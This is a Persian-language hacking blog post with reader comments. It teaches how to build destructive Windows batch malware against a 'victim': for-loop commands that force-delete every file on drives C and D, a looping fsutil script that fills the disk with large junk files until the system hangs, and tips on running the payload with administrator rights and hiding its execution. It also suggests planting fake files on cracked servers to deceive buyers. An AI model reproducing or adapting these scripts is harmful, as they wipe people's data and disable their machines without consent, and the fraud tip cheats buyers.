تخریب اطلاعات سیستم قربانی :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات
  • ۶ ارديبهشت ۰۳، ۱۶:۱۵ - hidden
    test

با سلام خدمت همگی دوستان قدیمی و جدید وبلاگ ViRus32

توی این آموزش قراره راجب از بین بردن اطلاعات سیستم قربانی و به هنگ انداختن سیستم قربانی صحبت کنیم

اما از اونجایی که کمیته فیلترینگ به این وبلاگ خیلی لطف داره مجبوریم یه خرده ریز توضیح بدیم تا خودتون کار اصلیشو انجام بدید

همونطور که ViRus32 هم قبلا گفته بود

ویروسای مخرب همیشه از تکه کدهای ساده و کاربردی ایجاد میشن

برای همین ما هم قراره توی این پست تکه کد ساده و کاربردی معرفی کنیم که میتونه اطلاعات یه سیستم رو از بین ببره و یکسری فایل آت و آشغال رو با فایلای اصلی و شاید مهم سیستم قربانی جایگزین کنه

صد البته به جای اینکار ما میتونیم با دستور فرمت خیلی سریعتر و راحت تر اینکار رو انجام بدیم

اما بعضی وقتا سطح دسترسی اجازه اینکار رو نمیده که ما هم خیلی راحت میتونیم با یه تکه کد ساده از یه روش دیگه پیروی کنیم

یا اصن برنامه های کاربردی و مخرب دیگه بسازیم و اهداف خودمون رو پیاده سازی کنیم

For /R D:\ %i in (*) do echo %i && Ping "LocalHost"  > nul -n 2 && CLS

کد بالا رو که توی خط فرمان وارد کنید متوجه میشید که میاد و اسم تک تک فایلاتون رو دو ثانیه یکبار دونه به دونه نشون میده

حالا ما میتونیم به جای دستور Echo از دستور Del استفاده کنیم تا به جای نمایش فایل ها اون فایل از بین بره

For /R D:\ %i in (*) do del /F /S /Q %i && Ping "LocalHost"  > nul -n 2 && CLS

که البته چون ما از دستور Ping استفاده کردیم و دستور دادیم که هر دو ثانیه یکبار یه فایل پاک بشه اینکار زیاد جالب نمیشه و ممکنه پروسه ی برناممون یه خرده طولانی بشه که بهتره این شکلی بنویسیم :

For /R D:\ %i in (*) do del /F /S /Q %i CLS

حتما دقت کنید از کدهای بالا داخل خط فرمان استفاده کنید و سریعا بعد از اجرا خط فرمان رو ببندین یا کلید های ترکیبی Ctrl + C رو فشار بدین تا کد وارد شده به روند اجرا و تخریب خودش ادامه نده

و اینکه دقت کنین اگه قراره داخل یه Batch فایل قرار بدین و از راه دور به سیستم قربانی دسترسی ندارین باید به جای i% حتما از i%% استفاده کنین

همونطور که گفتم هدفم یه اشاره ی ریز بود و حالا شما هستین که باید از تکه های بالا یه برنامه مخرب بسازین و به جای تخریب فایل های درایو D دستور تخریب فایل درایوای دیگه رو هم بدین

For /R C:\ %%i in (*) do del /F /S /Q %%i CLS
For /R D:\ %%i in (*) do del /F /S /Q %%i CLS

Va...

کدهای بالا هم برای یه فایل Batch هستش که باید به جای ...Va اسم درایوهای دیگه رو هم اضافه کنین

ضمنا به این مورد اشاره کنم که میتونین علاوه بر لیست و حذف کردن فایل ها

داخل کد به جای ستاره ( * ) از نقطه ( . ) استفاده کنین و اسم فولدرها یا همون پوشه های سیستم قربانی رو بدست بیارین و بعدش با دستور RmDir اونهارو از بین ببرید که من طرز نوشتنش رو گفتم و نوشتنش با خودتونه که یه خرده تنبل به بار نیاین :)

حالا میرسیم به نحوه ی پر کردن هارد سیستم قربانی از اطلاعات چرت و پرت

برای اینکار ما از دستور Fsutil استفاده میکنیم که خوشبختانه این دستور روی سیستم عامل های قدیمی هم موجوده و موجب میشه که ویروس ما روی همه ی سیستم عامل های ویندوزی اجرا بشه

یه بچ فایل ایجاد کنین و کدهای پایین رو داخلش قرار بدین

Cd %UserProfile%\Desktop
:Start
Fsutil file createnew %random%.bak %random%
Fsutil file createnew %random%.mp3 %random%
Fsutil file createnew %random%.mp4 %random%
Goto Start

وقتی که کدهارو قرار دادین با کلید های Ctrl + C اونارو داخل فایل ذخیره کنید و اونو اجرا کنین و سریع ببندید

بعد از اجرا و بستن یه نیم نگاه به صفحه ی دسکتاپتون بندازین تا بهتر متوجه بشین که این کدها دقیقا قراره چیکار کنن

در واقع این کدها میان یه فایل با اسم تصادفی و پسوند های bak و mp3 و mp4 فایل های چرت و پرت ایجاد میکنن که موجب میشه هارد سیستم قربانی از اطلاعات مزخرف پر بشه و اگه سیستم قربانی کم بیاره میتونه موجب هنگی سیستم طرفمون هم بشه...

همچنین میتونیم به جای استفاده از %random% از یه سایز بیشتر هم برای فایلی که قراره ایجاد بشه استفاده کنیم

Fsutil file createnew %random%.bak 999999999

مثلا کد بالا یه فایل معادل حجم یک گیگابایت ایجاد میکنه

اما این کدها کاربردای دیگه هم داره

به عنوان مثال اینروزا آدمایی هستن که سرور مجازی کرک میکنین و سرور های هارد دار رو میفروشن که با این روش میتونین فایل فیک روی سرور ایجاد کنن و سرورارو به خریدار اینجور سرور ها بفروشن...

در کل کدی که قرار دادم رو یه خرده دستکاری کنین و سعی کنین اهدافتون رو خودتون پیاده سازی کنید

اگر سوالی هم بود بپرسین حتما سر فرصت جوابتون رو میدم

موفق باشید

نظر (۱۵)

سلام بعد از عمری یک پست گذاشتی خخخ

چرا هنوز پست حمله SQL رو منتشر نکردی ؟؟

Virus32 MR_C0D3R ‌ :
سلام
خیلی دلم میخواست از پیش نویس درش بیارم و ادامه بدم
اما چون پستی که ویروس راجب اینکار گذاشته بود فیلتر بود
بخاطر همین احتمال داره کمیته فیلترینگ فکر کنه باهاش لج کردیم شوخی شوخی مثل قبل بزنه کل وب رو فیلتر کنه :)

خیلی خفن بود فقط الان موندم رو کی امتحان کنم ؟؟؟

از ستاد فیلترینگ هم تشکر می کنم ♥_♥

رود mmb هم اجرا میشه ؟

اگر اجرا میشه اموزش اون رو هم بذارید ممنون میشم

Virus32 MR_C0D3R ‌ :
بله میشه اجرا کرد
و اینکار توی این پست توضیح داده شده که چطور یه فایل Bat رو میتونیم اجرا کنیم

سلام

 

اگر یه فایل مخرب با دسترسی ادمین اجرا بشه ویندوز دیفندر می تونه برنامه رو متوقف کنه؟

Virus32 Virus 32 :
سلام
وقتی اجرا شده باشه فکر نکنم بتونه جلوشو بگیره
دیفندر قبل از اجرا کار بد افزار رو یسره میکنه
ولی در کل آنتی ویروس خیلی خوبیه

سلام در پایتون و تابع os.system()

جیکار کنیم برنامه مخفی دستوور رو اجرا کنه؟؟؟؟

Virus32 MR_C0D3R ‌ :
راجب subprocess و مقادیرش تحقیق کن

سلام ویروس

ناامید شدم

هرکاری بگی کردم هم تو پایتون و سی پلاس پلاس و بت و سی شارپ و...

این دسترسی ادمین نمیزاره هیچ کاری کنم تو درایو سی

Virus32 32 Attacker ‌ :
سلام، به برنامه ت سطح دسترسی ادمین بده

سلام خلی پروژه های جالبی انجام دادی
راستش دارم یه دوره میدیویی ویروس نویسی با پایتون ضبط میکنم اگه اجازه بده ک مطالب تو هم استفاده کنم ;)

باسلام خسته نباشیدبسیارجالب بودامامیبخشیدمن مبتدی هستم وسوالم اینه که این کدابه چه زبونی هستن؟؟

Virus32 32 Attacker ‌ :
سلام رضا جون قربونت، اینا کدای بچ فایله، یا بهش میگن بات. با پسوند bat ذخیره میشه و با خط فرمان (cmd) اجرا میشه

حال کردم رفیق چ استفاده هایی ک نکردم از ین D:

Virus32 MR_C0D3R ‌ :
:()
بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است

** **** **** ***** ***** **** **** **** **** *** ** **********

 

بخندم یا گریه کنم

علی 8 ساله از مشهد

سلام ببخشید کدی که بشه باهاش این کد هارو بهش تعمیم داد و دسترسی ادمین بگیره از یوزر رو میشه لطف کنید بگید

Virus32 Virus 32 :
سلام
میتونی با رفتن به تنظیمات فایلی که درست کردی هم گزینه run as admin رو فعال کنی
ولی برای اینکه کدی هم نوشته باشیم ...
runas /user:Administrator virus32.exe
بجای virus32.exe اسم فایل مورد نظرت رو باید بنویسی

میشه بپرسم که چجوری میشه جند تا فایل که پسوند .py دارن رو یکی کرد که بعد با این کد همه با هم باز بشن عزیز

Virus32 Virus 32 :
import multiprocessing

def worker(file):


if __name__ == '__main__':
files = ["path/to/file1.py","path/to/file2.py","path/to/file3.py"]
for i in files:
p = multiprocessing.Process(target=worker, args=(i,))
p.start()

دمت گرم خیلی به دردم می خوره این کتاب خونه ممنون D:

Virus32 Virus 32 :

بابا دم همه مقاله نویس هاتون و سازنده سایت گرم 

من یک بار یکی تو روبیکا هکم کرد و پیام های زشت به همه مخاطبین ارسال میکرد

از  همون موقع کرمم گل کرد و اومدم اینجا آموزش ببینم رو دوستام کرم بریزیم :)

من و دوستم باهم برنامه نویسی پایتون انجام میدیم و از اینجا کلی چیز یاد گرفتیم

از جای اون هم تشکر میکنم از مستر کدر و ویروس جان♥️🗿♥️

Virus32 Virus 32 :
♥♥♥
ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی